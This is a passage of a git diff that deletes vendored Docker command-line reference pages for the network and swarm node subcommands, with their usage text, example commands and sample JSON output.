- -Once you have prepared the `overlay` network prerequisites you simply choose a -Docker host in the cluster and issue the following to create the network: - -```bash -$ docker network create -d overlay my-multihost-network -``` - -Network names must be unique. The Docker daemon attempts to identify naming -conflicts but this is not guaranteed. It is the user's responsibility to avoid -name conflicts. - -## Connect containers - -When you start a container, use the `--network` flag to connect it to a network. -This example adds the `busybox` container to the `mynet` network: - -```bash -$ docker run -itd --network=mynet busybox -``` - -If you want to add a container to a network after the container is already -running, use the `docker network connect` subcommand. - -You can connect multiple containers to the same network. Once connected, the -containers can communicate using only another container's IP address or name. -For `overlay` networks or custom plugins that support multi-host connectivity, -containers connected to the same multi-host network but launched from different -Engines can also communicate in this way. - -You can disconnect a container from a network using the `docker network -disconnect` command. - -## Specifying advanced options - -When you create a network, Engine creates a non-overlapping subnetwork for the -network by default. This subnetwork is not a subdivision of an existing -network. It is purely for ip-addressing purposes. You can override this default -and specify subnetwork values directly using the `--subnet` option. On a -`bridge` network you can only create a single subnet: - -```bash -$ docker network create --driver=bridge --subnet=192.168.0.0/16 br0 -``` - -Additionally, you also specify the `--gateway` `--ip-range` and `--aux-address` -options. 
- -```bash -$ docker network create \ - --driver=bridge \ - --subnet=172.28.0.0/16 \ - --ip-range=172.28.5.0/24 \ - --gateway=172.28.5.254 \ - br0 -``` - -If you omit the `--gateway` flag the Engine selects one for you from inside a -preferred pool. For `overlay` networks and for network driver plugins that -support it you can create multiple subnetworks. - -```bash -$ docker network create -d overlay \ - --subnet=192.168.0.0/16 \ - --subnet=192.170.0.0/16 \ - --gateway=192.168.0.100 \ - --gateway=192.170.0.100 \ - --ip-range=192.168.1.0/24 \ - --aux-address="my-router=192.168.1.5" --aux-address="my-switch=192.168.1.6" \ - --aux-address="my-printer=192.170.1.5" --aux-address="my-nas=192.170.1.6" \ - my-multihost-network -``` - -Be sure that your subnetworks do not overlap. If they do, the network create -fails and Engine returns an error. - -# Bridge driver options - -When creating a custom network, the default network driver (i.e. `bridge`) has -additional options that can be passed. The following are those options and the -equivalent docker daemon flags used for docker0 bridge: - -| Option | Equivalent | Description | -|--------------------------------------------------|-------------|-------------------------------------------------------| -| `com.docker.network.bridge.name` | - | bridge name to be used when creating the Linux bridge | -| `com.docker.network.bridge.enable_ip_masquerade` | `--ip-masq` | Enable IP masquerading | -| `com.docker.network.bridge.enable_icc` | `--icc` | Enable or Disable Inter Container Connectivity | -| `com.docker.network.bridge.host_binding_ipv4` | `--ip` | Default IP when binding container ports | -| `com.docker.network.driver.mtu` | `--mtu` | Set the containers network MTU | - -The following arguments can be passed to `docker network create` for any -network driver, again with their approximate equivalents to `docker daemon`. 
- -| Argument | Equivalent | Description | -|--------------|----------------|--------------------------------------------| -| `--gateway` | - | IPv4 or IPv6 Gateway for the master subnet | -| `--ip-range` | `--fixed-cidr` | Allocate IPs from a range | -| `--internal` | - | Restrict external access to the network | -| `--ipv6` | `--ipv6` | Enable IPv6 networking | -| `--subnet` | `--bip` | Subnet for network | - -For example, let's use `-o` or `--opt` options to specify an IP address binding -when publishing ports: - -```bash -$ docker network create \ - -o "com.docker.network.bridge.host_binding_ipv4"="172.19.0.1" \ - simple-network -``` - -### Network internal mode - -By default, when you connect a container to an `overlay` network, Docker also -connects a bridge network to it to provide external connectivity. If you want -to create an externally isolated `overlay` network, you can specify the -`--internal` option. - -## Related information - -* [network inspect](network_inspect.md) -* [network connect](network_connect.md) -* [network disconnect](network_disconnect.md) -* [network ls](network_ls.md) -* [network rm](network_rm.md) -* [network prune](network_prune.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md deleted file mode 100644 index 42e976a500..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_disconnect.md +++ /dev/null @@ -1,43 +0,0 @@ ---- -title: "network disconnect" -description: "The network disconnect command description and usage" -keywords: "network, disconnect, user-defined" ---- - - - -# network disconnect - -```markdown -Usage: docker network disconnect [OPTIONS] NETWORK CONTAINER - -Disconnect a container from a network - -Options: - -f, --force Force the container to disconnect from a 
network - --help Print usage -``` - -Disconnects a container from a network. The container must be running to disconnect it from the network. - -```bash - $ docker network disconnect multi-host-network container1 -``` - - -## Related information - -* [network inspect](network_inspect.md) -* [network connect](network_connect.md) -* [network create](network_create.md) -* [network ls](network_ls.md) -* [network rm](network_rm.md) -* [network prune](network_prune.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md deleted file mode 100644 index bc0005e38e..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_inspect.md +++ /dev/null @@ -1,192 +0,0 @@ ---- -title: "network inspect" -description: "The network inspect command description and usage" -keywords: "network, inspect, user-defined" ---- - - - -# network inspect - -```markdown -Usage: docker network inspect [OPTIONS] NETWORK [NETWORK...] - -Display detailed information on one or more networks - -Options: - -f, --format string Format the output using the given Go template - --help Print usage -``` - -Returns information about one or more networks. By default, this command renders all results in a JSON object. For example, if you connect two containers to the default `bridge` network: - -```bash -$ sudo docker run -itd --name=container1 busybox -f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27 - -$ sudo docker run -itd --name=container2 busybox -bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727 -``` - -The `network inspect` command shows the containers, by id, in its -results. For networks backed by multi-host network driver, such as Overlay, -this command also shows the container endpoints in other hosts in the -cluster. 
These endpoints are represented as "ep-{endpoint-id}" in the output. -However, for swarm-scoped networks, only the endpoints that are local to the -node are shown. - -You can specify an alternate format to execute a given -template for each result. Go's -[text/template](http://golang.org/pkg/text/template/) package describes all the -details of the format. - -```bash -$ sudo docker network inspect bridge -[ - { - "Name": "bridge", - "Id": "b2b1a2cba717161d984383fd68218cf70bbbd17d328496885f7c921333228b0f", - "Created": "2016-10-19T04:33:30.360899459Z", - "Scope": "local", - "Driver": "bridge", - "IPAM": { - "Driver": "default", - "Config": [ - { - "Subnet": "172.17.42.1/16", - "Gateway": "172.17.42.1" - } - ] - }, - "Internal": false, - "Containers": { - "bda12f8922785d1f160be70736f26c1e331ab8aaf8ed8d56728508f2e2fd4727": { - "Name": "container2", - "EndpointID": "0aebb8fcd2b282abe1365979536f21ee4ceaf3ed56177c628eae9f706e00e019", - "MacAddress": "02:42:ac:11:00:02", - "IPv4Address": "172.17.0.2/16", - "IPv6Address": "" - }, - "f2870c98fd504370fb86e59f32cd0753b1ac9b69b7d80566ffc7192a82b3ed27": { - "Name": "container1", - "EndpointID": "a00676d9c91a96bbe5bcfb34f705387a33d7cc365bac1a29e4e9728df92d10ad", - "MacAddress": "02:42:ac:11:00:01", - "IPv4Address": "172.17.0.1/16", - "IPv6Address": "" - } - }, - "Options": { - "com.docker.network.bridge.default_bridge": "true", - "com.docker.network.bridge.enable_icc": "true", - "com.docker.network.bridge.enable_ip_masquerade": "true", - "com.docker.network.bridge.host_binding_ipv4": "0.0.0.0", - "com.docker.network.bridge.name": "docker0", - "com.docker.network.driver.mtu": "1500" - }, - "Labels": {} - } -] -``` - -Returns the information about the user-defined network: - -```bash -$ docker network create simple-network -69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a -$ docker network inspect simple-network -[ - { - "Name": "simple-network", - "Id": 
"69568e6336d8c96bbf57869030919f7c69524f71183b44d80948bd3927c87f6a", - "Created": "2016-10-19T04:33:30.360899459Z", - "Scope": "local", - "Driver": "bridge", - "IPAM": { - "Driver": "default", - "Config": [ - { - "Subnet": "172.22.0.0/16", - "Gateway": "172.22.0.1" - } - ] - }, - "Containers": {}, - "Options": {}, - "Labels": {} - } -] -``` - -For swarm mode overlay networks `network inspect` also shows the IP address and node name -of the peers. Peers are the nodes in the swarm cluster which have at least one task attached -to the network. Node name is of the format `-`. - -```bash -$ docker network inspect ingress -[ - { - "Name": "ingress", - "Id": "j0izitrut30h975vk4m1u5kk3", - "Created": "2016-11-08T06:49:59.803387552Z", - "Scope": "swarm", - "Driver": "overlay", - "EnableIPv6": false, - "IPAM": { - "Driver": "default", - "Options": null, - "Config": [ - { - "Subnet": "10.255.0.0/16", - "Gateway": "10.255.0.1" - } - ] - }, - "Internal": false, - "Attachable": false, - "Containers": { - "ingress-sbox": { - "Name": "ingress-endpoint", - "EndpointID": "40e002d27b7e5d75f60bc72199d8cae3344e1896abec5eddae9743755fe09115", - "MacAddress": "02:42:0a:ff:00:03", - "IPv4Address": "10.255.0.3/16", - "IPv6Address": "" - } - }, - "Options": { - "com.docker.network.driver.overlay.vxlanid_list": "256" - }, - "Labels": {}, - "Peers": [ - { - "Name": "net-1-1d22adfe4d5c", - "IP": "192.168.33.11" - }, - { - "Name": "net-2-d55d838b34af", - "IP": "192.168.33.12" - }, - { - "Name": "net-3-8473f8140bd9", - "IP": "192.168.33.13" - } - ] - } -] -``` - -## Related information - -* [network disconnect ](network_disconnect.md) -* [network connect](network_connect.md) -* [network create](network_create.md) -* [network ls](network_ls.md) -* [network rm](network_rm.md) -* [network prune](network_prune.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md 
b/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md deleted file mode 100644 index a4f671d569..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_ls.md +++ /dev/null @@ -1,218 +0,0 @@ ---- -title: "network ls" -description: "The network ls command description and usage" -keywords: "network, list, user-defined" ---- - - - -# docker network ls - -```markdown -Usage: docker network ls [OPTIONS] - -List networks - -Aliases: - ls, list - -Options: - -f, --filter filter Provide filter values (e.g. 'driver=bridge') - --format string Pretty-print networks using a Go template - --help Print usage - --no-trunc Do not truncate the output - -q, --quiet Only display network IDs -``` - -Lists all the networks the Engine `daemon` knows about. This includes the -networks that span across multiple hosts in a cluster, for example: - -```bash -$ sudo docker network ls -NETWORK ID NAME DRIVER SCOPE -7fca4eb8c647 bridge bridge local -9f904ee27bf5 none null local -cf03ee007fb4 host host local -78b03ee04fc4 multi-host overlay swarm -``` - -Use the `--no-trunc` option to display the full network id: - -```bash -$ docker network ls --no-trunc -NETWORK ID NAME DRIVER SCOPE -18a2866682b85619a026c81b98a5e375bd33e1b0936a26cc497c283d27bae9b3 none null local -c288470c46f6c8949c5f7e5099b5b7947b07eabe8d9a27d79a9cbf111adcbf47 host host local -7b369448dccbf865d397c8d2be0cda7cf7edc6b0945f77d2529912ae917a0185 bridge bridge local -95e74588f40db048e86320c6526440c504650a1ff3e9f7d60a497c4d2163e5bd foo bridge local -63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 dev bridge local -``` - -## Filtering - -The filtering flag (`-f` or `--filter`) format is a `key=value` pair. If there -is more than one filter, then pass multiple flags (e.g. `--filter "foo=bar" --filter "bif=baz"`). -Multiple filter flags are combined as an `OR` filter. For example, -`-f type=custom -f type=builtin` returns both `custom` and `builtin` networks. 
- -The currently supported filters are: - -* driver -* id (network's id) -* label (`label=` or `label==`) -* name (network's name) -* type (custom|builtin) - -#### Driver - -The `driver` filter matches networks based on their driver. - -The following example matches networks with the `bridge` driver: - -```bash -$ docker network ls --filter driver=bridge -NETWORK ID NAME DRIVER SCOPE -db9db329f835 test1 bridge local -f6e212da9dfd test2 bridge local -``` - -#### ID - -The `id` filter matches on all or part of a network's ID. - -The following filter matches all networks with an ID containing the -`63d1ff1f77b0...` string. - -```bash -$ docker network ls --filter id=63d1ff1f77b07ca51070a8c227e962238358bd310bde1529cf62e6c307ade161 -NETWORK ID NAME DRIVER SCOPE -63d1ff1f77b0 dev bridge local -``` - -You can also filter for a substring in an ID as this shows: - -```bash -$ docker network ls --filter id=95e74588f40d -NETWORK ID NAME DRIVER SCOPE -95e74588f40d foo bridge local - -$ docker network ls --filter id=95e -NETWORK ID NAME DRIVER SCOPE -95e74588f40d foo bridge local -``` - -#### Label - -The `label` filter matches networks based on the presence of a `label` alone or a `label` and a -value. - -The following filter matches networks with the `usage` label regardless of its value. - -```bash -$ docker network ls -f "label=usage" -NETWORK ID NAME DRIVER SCOPE -db9db329f835 test1 bridge local -f6e212da9dfd test2 bridge local -``` - -The following filter matches networks with the `usage` label with the `prod` value. - -```bash -$ docker network ls -f "label=usage=prod" -NETWORK ID NAME DRIVER SCOPE -f6e212da9dfd test2 bridge local -``` - -#### Name - -The `name` filter matches on all or part of a network's name. - -The following filter matches all networks with a name containing the `foobar` string. 
- -```bash -$ docker network ls --filter name=foobar -NETWORK ID NAME DRIVER SCOPE -06e7eef0a170 foobar bridge local -``` - -You can also filter for a substring in a name as this shows: - -```bash -$ docker network ls --filter name=foo -NETWORK ID NAME DRIVER SCOPE -95e74588f40d foo bridge local -06e7eef0a170 foobar bridge local -``` - -#### Type - -The `type` filter supports two values; `builtin` displays predefined networks -(`bridge`, `none`, `host`), whereas `custom` displays user defined networks. - -The following filter matches all user defined networks: - -```bash -$ docker network ls --filter type=custom -NETWORK ID NAME DRIVER SCOPE -95e74588f40d foo bridge local -63d1ff1f77b0 dev bridge local -``` - -By having this flag it allows for batch cleanup. For example, use this filter -to delete all user defined networks: - -```bash -$ docker network rm `docker network ls --filter type=custom -q` -``` - -A warning will be issued when trying to remove a network that has containers -attached. - -## Formatting - -The formatting options (`--format`) pretty-prints networks output -using a Go template. - -Valid placeholders for the Go template are listed below: - -Placeholder | Description -------------|------------------------------------------------------------------------------------------ -`.ID` | Network ID -`.Name` | Network name -`.Driver` | Network driver -`.Scope` | Network scope (local, global) -`.IPv6` | Whether IPv6 is enabled on the network or not. -`.Internal` | Whether the network is internal or not. -`.Labels` | All labels assigned to the network. -`.Label` | Value of a specific label for this network. For example `{{.Label "project.version"}}` - -When using the `--format` option, the `network ls` command will either -output the data exactly as the template declares or, when using the -`table` directive, includes column headers as well. 
- -The following example uses a template without headers and outputs the -`ID` and `Driver` entries separated by a colon for all networks: - -```bash -$ docker network ls --format "{{.ID}}: {{.Driver}}" -afaaab448eb2: bridge -d1584f8dc718: host -391df270dc66: null -``` - -## Related information - -* [network disconnect ](network_disconnect.md) -* [network connect](network_connect.md) -* [network create](network_create.md) -* [network inspect](network_inspect.md) -* [network rm](network_rm.md) -* [network prune](network_prune.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md deleted file mode 100644 index 5b65465600..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_prune.md +++ /dev/null @@ -1,45 +0,0 @@ ---- -title: "network prune" -description: "Remove unused networks" -keywords: "network, prune, delete" ---- - -# network prune - -```markdown -Usage: docker network prune [OPTIONS] - -Remove all unused networks - -Options: - -f, --force Do not prompt for confirmation - --help Print usage -``` - -Remove all unused networks. Unused networks are those which are not referenced by any containers. - -Example output: - -```bash -$ docker network prune -WARNING! This will remove all networks not used by at least one container. -Are you sure you want to continue? 
[y/N] y -Deleted Networks: -n1 -n2 -``` - -## Related information - -* [network disconnect ](network_disconnect.md) -* [network connect](network_connect.md) -* [network create](network_create.md) -* [network ls](network_ls.md) -* [network inspect](network_inspect.md) -* [network rm](network_rm.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) -* [system df](system_df.md) -* [container prune](container_prune.md) -* [image prune](image_prune.md) -* [volume prune](volume_prune.md) -* [system prune](system_prune.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md deleted file mode 100644 index f06b4c002d..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/network_rm.md +++ /dev/null @@ -1,59 +0,0 @@ ---- -title: "network rm" -description: "the network rm command description and usage" -keywords: "network, rm, user-defined" ---- - - - -# network rm - -```markdown -Usage: docker network rm NETWORK [NETWORK...] - -Remove one or more networks - -Aliases: - rm, remove - -Options: - --help Print usage -``` - -Removes one or more networks by name or identifier. To remove a network, -you must first disconnect any containers connected to it. -To remove the network named 'my-network': - -```bash - $ docker network rm my-network -``` - -To delete multiple networks in a single `docker network rm` command, provide -multiple network names or ids. The following example deletes a network with id -`3695c422697f` and a network named `my-network`: - -```bash - $ docker network rm 3695c422697f my-network -``` - -When you specify multiple networks, the command attempts to delete each in turn. -If the deletion of one network fails, the command continues to the next on the -list and tries to delete that. The command reports success or failure for each -deletion. 
- -## Related information - -* [network disconnect ](network_disconnect.md) -* [network connect](network_connect.md) -* [network create](network_create.md) -* [network ls](network_ls.md) -* [network inspect](network_inspect.md) -* [network prune](network_prune.md) -* [Understand Docker container networks](https://docs.docker.com/engine/userguide/networking/) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md deleted file mode 100644 index 9a81bb9c04..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_demote.md +++ /dev/null @@ -1,42 +0,0 @@ ---- -title: "node demote" -description: "The node demote command description and usage" -keywords: "node, demote" ---- - - - -# node demote - -```markdown -Usage: docker node demote NODE [NODE...] - -Demote one or more nodes from manager in the swarm - -Options: - --help Print usage - -``` - -Demotes an existing manager so that it is no longer a manager. This command targets a docker engine that is a manager in the swarm. - - -```bash -$ docker node demote -``` - -## Related information - -* [node inspect](node_inspect.md) -* [node ls](node_ls.md) -* [node promote](node_promote.md) -* [node ps](node_ps.md) -* [node rm](node_rm.md) -* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md deleted file mode 100644 index fac688fe40..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_inspect.md +++ /dev/null @@ -1,137 +0,0 @@ ---- -title: "node inspect" -description: "The node inspect command description and usage" -keywords: "node, inspect" ---- - - - -# node inspect - -```markdown -Usage: docker node inspect [OPTIONS] self|NODE [NODE...] 
- -Display detailed information on one or more nodes - -Options: - -f, --format string Format the output using the given Go template - --help Print usage - --pretty Print the information in a human friendly format. -``` - -Returns information about a node. By default, this command renders all results -in a JSON array. You can specify an alternate format to execute a -given template for each result. Go's -[text/template](http://golang.org/pkg/text/template/) package describes all the -details of the format. - -Example output: - - $ docker node inspect swarm-manager - [ - { - "ID": "e216jshn25ckzbvmwlnh5jr3g", - "Version": { - "Index": 10 - }, - "CreatedAt": "2016-06-16T22:52:44.9910662Z", - "UpdatedAt": "2016-06-16T22:52:45.230878043Z", - "Spec": { - "Role": "manager", - "Availability": "active" - }, - "Description": { - "Hostname": "swarm-manager", - "Platform": { - "Architecture": "x86_64", - "OS": "linux" - }, - "Resources": { - "NanoCPUs": 1000000000, - "MemoryBytes": 1039843328 - }, - "Engine": { - "EngineVersion": "1.12.0", - "Plugins": [ - { - "Type": "Volume", - "Name": "local" - }, - { - "Type": "Network", - "Name": "overlay" - }, - { - "Type": "Network", - "Name": "null" - }, - { - "Type": "Network", - "Name": "host" - }, - { - "Type": "Network", - "Name": "bridge" - }, - { - "Type": "Network", - "Name": "overlay" - } - ] - } - }, - "Status": { - "State": "ready", - "Addr": "168.0.32.137" - }, - "ManagerStatus": { - "Leader": true, - "Reachability": "reachable", - "Addr": "168.0.32.137:2377" - } - } - ] - - {% raw %} - $ docker node inspect --format '{{ .ManagerStatus.Leader }}' self - false - {% endraw %} - - $ docker node inspect --pretty self - ID: e216jshn25ckzbvmwlnh5jr3g - Hostname: swarm-manager - Joined at: 2016-06-16 22:52:44.9910662 +0000 utc - Status: - State: Ready - Availability: Active - Address: 172.17.0.2 - Manager Status: - Address: 172.17.0.2:2377 - Raft Status: Reachable - Leader: Yes - Platform: - Operating System: linux - Architecture: 
x86_64 - Resources: - CPUs: 4 - Memory: 7.704 GiB - Plugins: - Network: overlay, bridge, null, host, overlay - Volume: local - Engine Version: 1.12.0 - -## Related information - -* [node demote](node_demote.md) -* [node ls](node_ls.md) -* [node promote](node_promote.md) -* [node ps](node_ps.md) -* [node rm](node_rm.md) -* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md deleted file mode 100644 index 5f61713c2e..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_ls.md +++ /dev/null @@ -1,130 +0,0 @@ ---- -title: "node ls" -description: "The node ls command description and usage" -keywords: "node, list" ---- - - - -# node ls - -```markdown -Usage: docker node ls [OPTIONS] - -List nodes in the swarm - -Aliases: - ls, list - -Options: - -f, --filter value Filter output based on conditions provided - --help Print usage - -q, --quiet Only display IDs -``` - -Lists all the nodes that the Docker Swarm manager knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options. - -Example output: - -```bash -$ docker node ls - -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active -38ciaotwjuritcdtn9npbnkuz swarm-worker1 Ready Active -e216jshn25ckzbvmwlnh5jr3g * swarm-manager1 Ready Active Leader -``` - -## Filtering - -The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more -than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* [id](node_ls.md#id) -* [label](node_ls.md#label) -* [membership](node_ls.md#membership) -* [name](node_ls.md#name) -* [role](node_ls.md#role) - -#### ID - -The `id` filter matches all or part of a node's id. 
- -```bash -$ docker node ls -f id=1 - -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active -``` - -#### Label - -The `label` filter matches nodes based on engine labels and on the presence of a `label` alone or a `label` and a value. Node labels are currently not used for filtering. - -The following filter matches nodes with the `foo` label regardless of its value. - -```bash -$ docker node ls -f "label=foo" - -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active -``` - -#### Membership - -The `membership` filter matches nodes based on the presence of a `membership` and a value -`accepted` or `pending`. - -The following filter matches nodes with the `membership` of `accepted`. - -```bash -$ docker node ls -f "membership=accepted" - -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -1bcef6utixb0l0ca7gxuivsj0 swarm-worker2 Ready Active -38ciaotwjuritcdtn9npbnkuz swarm-worker1 Ready Active -``` - -#### Name - -The `name` filter matches on all or part of a node hostname. - -The following filter matches the nodes with a name equal to `swarm-master` string. - -```bash -$ docker node ls -f name=swarm-manager1 - -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -e216jshn25ckzbvmwlnh5jr3g * swarm-manager1 Ready Active Leader -``` - -#### Role - -The `role` filter matches nodes based on the presence of a `role` and a value `worker` or `manager`. - -The following filter matches nodes with the `manager` role. 
- -```bash -$ docker node ls -f "role=manager" - -ID HOSTNAME STATUS AVAILABILITY MANAGER STATUS -e216jshn25ckzbvmwlnh5jr3g * swarm-manager1 Ready Active Leader -``` - -## Related information - -* [node demote](node_demote.md) -* [node inspect](node_inspect.md) -* [node promote](node_promote.md) -* [node ps](node_ps.md) -* [node rm](node_rm.md) -* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md deleted file mode 100644 index 92092a8935..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_promote.md +++ /dev/null @@ -1,41 +0,0 @@ ---- -title: "node promote" -description: "The node promote command description and usage" -keywords: "node, promote" ---- - - - -# node promote - -```markdown -Usage: docker node promote NODE [NODE...] - -Promote one or more nodes to manager in the swarm - -Options: - --help Print usage -``` - -Promotes a node to manager. This command targets a docker engine that is a manager in the swarm. - - -```bash -$ docker node promote -``` - -## Related information - -* [node demote](node_demote.md) -* [node inspect](node_inspect.md) -* [node ls](node_ls.md) -* [node ps](node_ps.md) -* [node rm](node_rm.md) -* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md deleted file mode 100644 index 7f07c5ea64..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_ps.md +++ /dev/null @@ -1,107 +0,0 @@ ---- -title: "node ps" -description: "The node ps command description and usage" -keywords: node, tasks, ps -aliases: ["/engine/reference/commandline/node_tasks/"] ---- - - - -# node ps - -```markdown -Usage: docker node ps [OPTIONS] [NODE...] - -List tasks running on one or more nodes, defaults to current node. 
- -Options: - -f, --filter value Filter output based on conditions provided - --help Print usage - --no-resolve Do not map IDs to Names - --no-trunc Do not truncate output -``` - -Lists all the tasks on a Node that Docker knows about. You can filter using the `-f` or `--filter` flag. Refer to the [filtering](#filtering) section for more information about available filter options. - -Example output: - - $ docker node ps swarm-manager1 - NAME IMAGE NODE DESIRED STATE CURRENT STATE - redis.1.7q92v0nr1hcgts2amcjyqg3pq redis:3.0.6 swarm-manager1 Running Running 5 hours - redis.6.b465edgho06e318egmgjbqo4o redis:3.0.6 swarm-manager1 Running Running 29 seconds - redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 5 seconds - redis.9.dkkual96p4bb3s6b10r7coxxt redis:3.0.6 swarm-manager1 Running Running 5 seconds - redis.10.0tgctg8h8cech4w0k0gwrmr23 redis:3.0.6 swarm-manager1 Running Running 5 seconds - - -## Filtering - -The filtering flag (`-f` or `--filter`) format is of "key=value". If there is more -than one filter, then pass multiple flags (e.g., `--filter "foo=bar" --filter "bif=baz"`) - -The currently supported filters are: - -* [name](#name) -* [id](#id) -* [label](#label) -* [desired-state](#desired-state) - -#### name - -The `name` filter matches on all or part of a task's name. - -The following filter matches all tasks with a name containing the `redis` string. 
- - $ docker node ps -f name=redis swarm-manager1 - NAME IMAGE NODE DESIRED STATE CURRENT STATE - redis.1.7q92v0nr1hcgts2amcjyqg3pq redis:3.0.6 swarm-manager1 Running Running 5 hours - redis.6.b465edgho06e318egmgjbqo4o redis:3.0.6 swarm-manager1 Running Running 29 seconds - redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 5 seconds - redis.9.dkkual96p4bb3s6b10r7coxxt redis:3.0.6 swarm-manager1 Running Running 5 seconds - redis.10.0tgctg8h8cech4w0k0gwrmr23 redis:3.0.6 swarm-manager1 Running Running 5 seconds - - -#### id - -The `id` filter matches a task's id. - - $ docker node ps -f id=bg8c07zzg87di2mufeq51a2qp swarm-manager1 - NAME IMAGE NODE DESIRED STATE CURRENT STATE - redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 5 seconds - - -#### label - -The `label` filter matches tasks based on the presence of a `label` alone or a `label` and a -value. - -The following filter matches tasks with the `usage` label regardless of its value. - -```bash -$ docker node ps -f "label=usage" -NAME IMAGE NODE DESIRED STATE CURRENT STATE -redis.6.b465edgho06e318egmgjbqo4o redis:3.0.6 swarm-manager1 Running Running 10 minutes -redis.7.bg8c07zzg87di2mufeq51a2qp redis:3.0.6 swarm-manager1 Running Running 9 minutes -``` - - -#### desired-state - -The `desired-state` filter can take the values `running`, `shutdown`, and `accepted`. 
- - -## Related information - -* [node demote](node_demote.md) -* [node inspect](node_inspect.md) -* [node ls](node_ls.md) -* [node promote](node_promote.md) -* [node rm](node_rm.md) -* [node update](node_update.md) diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md b/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md deleted file mode 100644 index b245d636cc..0000000000 --- a/vendor/github.com/docker/docker/docs/reference/commandline/node_rm.md +++ /dev/null @@ -1,73 +0,0 @@ ---- -title: "node rm" -description: "The node rm command description and usage" -keywords: "node, remove" ---- - - - -# node rm - -```markdown -Usage: docker node rm [OPTIONS] NODE [NODE...] - -Remove one or more nodes from the swarm - -Aliases: - rm, remove - -Options: - -f, --force Force remove a node from the swarm - --help Print usage -``` - -When run from a manager node, removes the specified nodes from a swarm. - - -Example output: - -```nohighlight -$ docker node rm swarm-node-02 - -Node swarm-node-02 removed from swarm -``` - -Removes the specified nodes from the swarm, but only if the nodes are in the -down state. If you attempt to remove an active node you will receive an error: - -```nohighlight -$ docker node rm swarm-node-03 - -Error response from daemon: rpc error: code = 9 desc = node swarm-node-03 is not -down and can't be removed -``` - -If you lose access to a worker node or need to shut it down because it has been -compromised or is not behaving as expected, you can use the `--force` option. -This may cause transient errors or interruptions, depending on the type of task -being run on the node. - -```nohighlight -$ docker node rm --force swarm-node-03 - -Node swarm-node-03 removed from swarm -``` - -A manager node must be demoted to a worker node (using `docker node demote`) -before you can remove it from the swarm. 
